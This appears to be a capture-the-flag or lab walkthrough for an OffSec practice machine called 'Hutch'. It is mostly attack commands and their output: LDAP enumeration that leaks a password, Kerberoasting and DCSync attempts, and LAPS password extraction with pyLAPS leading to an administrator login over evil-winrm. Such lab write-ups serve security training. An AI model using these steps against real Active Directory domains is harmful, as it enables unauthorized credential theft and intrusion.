Hutch

Owning DC machine with misconfiguration in LAPS service

Summary

I got the initial foothold to the machine using the credential discovered during LDAP enumeration.
Found LAPS misconfiguration issue using Bloodhound, where fmcsorley user has the ability to read the password set by LAPS on the DC machine.
Used this weekness to read the administrator password in plain text, finally getting both the flags.

🧵Let's Unpack

Enumeration

# NMAP
sudo nmap -sC -sN -A -oN nmapFull -p- -A 192.168.223.122

Nmap scan report for hutch.offsec (192.168.223.122)
Host is up (0.10s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/10.0
|   Server Date: Sun, 30 Jun 2024 14:54:04 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_  WebDAV type: Unknown
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-30 14:53:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 4 hops
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-06-30T14:54:10
|_  start_date: N/A

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   116.26 ms 192.168.45.1
2   114.35 ms 192.168.45.254
3   116.32 ms 192.168.251.1
4   116.32 ms hutch.offsec (192.168.223.122)

Using LDAP to list all usernames and their descriptions

ldapsearch -x -H ldap://192.168.223.122 -D '' -w '' -b "DC=hutch,DC=offsec"
>
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
 hange on next login.

# validated the credentials using CME
crackmapexec smb 192.168.223.122 -u 'fmcsorley' -p 'CrabSharkJellyfish192' --continue-on-success

Initial Foothold

Since remote access was disabled for this user, this machine is not vulnerable to AD-related common vulnerabilities like AS-REP, Kerberoast, DCSync, etc. I decided to use Bloodhound-python

# Checking for AS-REP Roasting
kerbrute userenum --dc 192.168.223.122 -d hutch.offsec -o kerbrute.username.out user.txt

# same using impacket
impacket-GetNPUsers -dc-ip 192.168.223.122 -no-pass -usersfile user.txt  hutch.offsec/ 

# Trying Kerberoasting
sudo impacket-GetUserSPNs -request -dc-ip 192.168.223.122 hutch.offsec/fmcsorley

# Trying DCSync
impacket-secretsdump -just-dc-user rplacidi hutch.offsec/fmcsorley:"CrabSharkJellyfish192"@192.168.223.122

# Enumerating SMB
crackmapexec smb 192.168.223.122 -u 'fmcsorley' -p 'CrabSharkJellyfish192' -M spider_plus

# ---- NO Luck----#

Trying Bloodhound

bloodhound-python -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -ns 192.168.223.122 -c All

FIndings

The user FMCSORLEY@HUTCH.OFFSEC has the ability to read the password set by Local Administrator Password Solution (LAPS) on the computer HUTCHDC.HUTCH.OFFSEC.

Privilege Escalation/Lateral Movement

Reading Administrator Password using LAPS misconfiguration using pyLAPS

Tool Used -> https://github.com/p0dalirius/pyLAPS

python pyLAPS.py --action get -u 'fmcsorley' -d 'hutch.offsec' -p 'CrabSharkJellyfish192' --dc-ip 192.168.223.122
>
[+] Extracting LAPS passwords of all computers ... 
  | HUTCHDC$             : 9kv,QRf@39912a
[+] All done!

# checking if the password belonged to any user
crackmapexec smb 192.168.223.122 -u ../user.txt -p '9kv,QRf@39912a' --continue-on-success 
>
SMB 192.168.223.122 445    HUTCHDC  [+] hutch.offsec\administrator:9kv,QRf@39912a (Pwn3d!)

Perfect! We got the administrator user's password in plain text. We can winrm to the machine and read flags for lower privilege users and Administrator, i.e. proof.txt

evil-winrm -i 192.168.223.122 -u administrator -p '9kv,QRf@39912a'

# Boom!  got local admin access

PreviousInternal NextAlgernon

Last updated 9 months ago

hashtagSummary

hashtag🧵Let's Unpack

hashtagEnumeration

hashtagInitial Foothold

hashtagFIndings

hashtagRead more about LAPS here:

hashtagPrivilege Escalation/Lateral Movement